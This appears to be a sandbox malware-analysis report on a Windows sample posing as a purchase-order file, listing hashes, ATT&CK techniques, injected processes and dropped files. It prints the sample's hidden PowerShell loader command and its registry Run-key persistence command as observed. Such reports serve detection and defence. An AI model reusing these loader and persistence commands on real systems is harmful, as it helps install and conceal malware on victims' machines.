d220538747164b56b83a6f324adae9b05a1d64a861ddb512c6139a12ca6c31a8

General

Target

PO#WH2E0520.exe
Size

988KB
MD5

328c8f1b566488c8e7f8cd0951c173d4
SHA1

2c45dce433d4dd782f0ed7c9a62494a1bdce13aa
SHA256

d220538747164b56b83a6f324adae9b05a1d64a861ddb512c6139a12ca6c31a8
SHA512

d0579cfd4fd61c611b8af986f8579e563f2abac814b260455e5d810076d609ff82bf8d7c7473ec3542e6035265308cb9bbf4fc7d9fb98b468bae74c12883367f
SSDEEP

24576:V4ezTAAfvu922zkq9+qDlcv3sWhegcKyJc:V4WAAfD2zk47lG3sWhegcXO

Score

8^/10

execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2900	powershell.exe

Loads dropped DLL 2 IoCs

pid	Process
2900	powershell.exe
2800	Nepotism.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\Disadvantageous94 = "%Curio% -windowstyle minimized $Nonexportation=(Get-ItemProperty -Path 'HKCU:\\Skidens\\').Scottify;%Curio% ($Nonexportation)"	reg.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\driftschefernes.ini	PO#WH2E0520.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2900	powershell.exe
2800	Nepotism.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2900 set thread context of 2800	2900	powershell.exe	32

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Common Files\twig\Monetising.lnk	PO#WH2E0520.exe
File opened for modification	C:\Program Files (x86)\inspiredly.snu	PO#WH2E0520.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Fonts\undispersing\frelserens.ini	PO#WH2E0520.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2464	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2900	powershell.exe
2900	powershell.exe
2900	powershell.exe
2900	powershell.exe
2900	powershell.exe
2900	powershell.exe
2900	powershell.exe
2900	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2900	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2900	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 1960 wrote to memory of 2900	1960	PO#WH2E0520.exe	28
PID 1960 wrote to memory of 2900	1960	PO#WH2E0520.exe	28
PID 1960 wrote to memory of 2900	1960	PO#WH2E0520.exe	28
PID 1960 wrote to memory of 2900	1960	PO#WH2E0520.exe	28
PID 2900 wrote to memory of 2648	2900	powershell.exe	30
PID 2900 wrote to memory of 2648	2900	powershell.exe	30
PID 2900 wrote to memory of 2648	2900	powershell.exe	30
PID 2900 wrote to memory of 2648	2900	powershell.exe	30
PID 2900 wrote to memory of 2800	2900	powershell.exe	32
PID 2900 wrote to memory of 2800	2900	powershell.exe	32
PID 2900 wrote to memory of 2800	2900	powershell.exe	32
PID 2900 wrote to memory of 2800	2900	powershell.exe	32
PID 2900 wrote to memory of 2800	2900	powershell.exe	32
PID 2900 wrote to memory of 2800	2900	powershell.exe	32
PID 2800 wrote to memory of 2616	2800	Nepotism.exe	33
PID 2800 wrote to memory of 2616	2800	Nepotism.exe	33
PID 2800 wrote to memory of 2616	2800	Nepotism.exe	33
PID 2800 wrote to memory of 2616	2800	Nepotism.exe	33
PID 2616 wrote to memory of 2464	2616	cmd.exe	35
PID 2616 wrote to memory of 2464	2616	cmd.exe	35
PID 2616 wrote to memory of 2464	2616	cmd.exe	35
PID 2616 wrote to memory of 2464	2616	cmd.exe	35

C:\Users\Admin\AppData\Local\Temp\PO#WH2E0520.exe
"C:\Users\Admin\AppData\Local\Temp\PO#WH2E0520.exe"
1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1960
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$Infanterienheden=Get-Content 'C:\Users\Admin\AppData\Local\skuespillerevnernes\Kilders219\Antiprelatism.Syn';$Potentializes=$Infanterienheden.SubString(17231,3);.$Potentializes($Infanterienheden)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2900
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
    3⤵
    PID:2648
- - C:\Users\Admin\AppData\Local\Temp\Nepotism.exe
    "C:\Users\Admin\AppData\Local\Temp\Nepotism.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of WriteProcessMemory
    PID:2800
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Disadvantageous94" /t REG_EXPAND_SZ /d "%Curio% -windowstyle minimized $Nonexportation=(Get-ItemProperty -Path 'HKCU:\Skidens\').Scottify;%Curio% ($Nonexportation)"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2616
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Disadvantageous94" /t REG_EXPAND_SZ /d "%Curio% -windowstyle minimized $Nonexportation=(Get-ItemProperty -Path 'HKCU:\Skidens\').Scottify;%Curio% ($Nonexportation)"
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2464

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\skuespillerevnernes\Kilders219\Antiprelatism.Syn

Filesize
50KB

MD5
a29b610601c6446ca5d925ff29d27383

SHA1
f80a215550b22baed58aac08bfed5726f0d7de60

SHA256
ed86d585901199bf8b1859e868b006718c326a5b2c1d27c7f69554f2f37e5107

SHA512
b159fd355542170bbfdf093cbfb6f8da169209f076cb2cb79d94af0146d0a04a4dd44a328b389bcf2fa333ad0ce14424bbf89c5e93e1160cadb4469f66184b6e

Download Submit
C:\Users\Admin\AppData\Local\skuespillerevnernes\Kilders219\Maksimalprisers22.Inv

Filesize
292KB

MD5
0e1c858b4256ec39ba6b617927aee0ca

SHA1
726e462e1e9e41270174722405625cb96509b30b

SHA256
88c6e14cb89d04fb1fab4fc45f62c903af1a9981622260de27cdb7e3e853b782

SHA512
3c6949dec4abf79b735b8c50beec3c3fcafec17aef17da5b10ddfeaab3d5dbcc590efe0e8b706a1706b5054c1cd6b55c37aa3fbbacd5553259f33a9ca8a8ee1e

Download Submit
\Users\Admin\AppData\Local\Temp\Nepotism.exe

Filesize
988KB

MD5
328c8f1b566488c8e7f8cd0951c173d4

SHA1
2c45dce433d4dd782f0ed7c9a62494a1bdce13aa

SHA256
d220538747164b56b83a6f324adae9b05a1d64a861ddb512c6139a12ca6c31a8

SHA512
d0579cfd4fd61c611b8af986f8579e563f2abac814b260455e5d810076d609ff82bf8d7c7473ec3542e6035265308cb9bbf4fc7d9fb98b468bae74c12883367f

Download Submit
memory/2800-21-0x0000000000400000-0x0000000001462000-memory.dmp

Filesize
16.4MB

Download
memory/2800-23-0x0000000000400000-0x0000000001462000-memory.dmp

Filesize
16.4MB

Download
memory/2900-8-0x0000000074311000-0x0000000074312000-memory.dmp

Filesize
4KB

Download
memory/2900-10-0x0000000074310000-0x00000000748BB000-memory.dmp

Filesize
5.7MB

Download
memory/2900-9-0x0000000074310000-0x00000000748BB000-memory.dmp

Filesize
5.7MB

Download
memory/2900-11-0x0000000074310000-0x00000000748BB000-memory.dmp

Filesize
5.7MB

Download
memory/2900-12-0x0000000074310000-0x00000000748BB000-memory.dmp

Filesize
5.7MB

Download
memory/2900-16-0x0000000006610000-0x000000000A72D000-memory.dmp

Filesize
65.1MB

Download
memory/2900-22-0x0000000074310000-0x00000000748BB000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads